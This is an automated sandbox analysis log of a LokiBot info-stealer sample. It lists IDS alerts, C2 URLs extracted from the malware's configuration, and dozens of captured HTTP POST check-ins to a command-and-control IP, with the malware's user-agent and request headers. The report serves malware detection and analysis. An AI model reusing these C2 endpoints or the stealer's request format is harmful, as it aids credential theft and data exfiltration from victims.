              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49825
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49827 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49827 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49827 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49827 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49827
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49829 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49829 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49829 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49829 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49829
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49833 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49833 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49833 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49833 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49833
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49845 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49845 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49845 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49845 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49845
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49851 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49851 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49851 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49851 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49851
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49855 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49855 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49855 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49855 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49855
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49856 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49856 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49856 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49856 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49856
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49857
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49858
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49859
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49860
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49861
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49862
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49863
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49865
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49866
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49867
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Joe Sandbox ViewASN Name: DATACENTERRO DATACENTERRO
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 163Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.167
              Source: U001P56ybm.exe, 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmpString found in binary or memory: http://194.85.248.167/imt/fre.php
              Source: U001P56ybm.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: U001P56ybm.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: U001P56ybm.exe, U001P56ybm.exe, 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, U001P56ybm.exe, 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: unknownHTTP traffic detected: POST /imt/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 194.85.248.167Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D93679CContent-Length: 190Connection: close
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_00404ED4 recv,2_2_00404ED4
